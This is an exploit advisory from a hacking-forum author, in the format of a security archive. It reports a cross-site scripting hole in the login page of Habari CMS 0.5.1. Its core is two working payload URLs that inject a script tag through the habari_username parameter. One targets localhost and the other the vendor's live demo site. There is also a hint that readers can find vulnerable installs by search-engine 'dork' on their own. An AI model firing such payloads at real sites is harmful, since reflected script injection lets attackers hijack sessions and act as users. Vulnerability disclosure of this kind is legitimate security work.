Habari version 0.5.1 suffers from a cross site scripting vulnerability.
09c94531927e3d214e904ad94ede9a60a869691d18e7296049bd1e0e58ecfb01################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
################################################################
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #
# -C1c4Tr1Z -Gabitzu and all darkc0de members #
;###############################################################
#
# Author: swappie [aka] faithlove
#
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
#
;###############################################################
#
# Title: Habari CMS 0.5.1
#
# CMS Link: http://habariproject.org/dist/habari_head.zip
#
# Vendor: http://habariproject.org/
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
################################################################
XSS Exploit;
------------
http://localhost/user/login/?habari_username=>"><script>alert("XSS Vuln")</script>
Live Demo;
----------
http://demo.habariproject.org/user/login/?habari_username=>"><script>alert("XSS Vuln")</script>
#################################################################
#
# Bug Discovered on: 16 October 2008
#
#################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed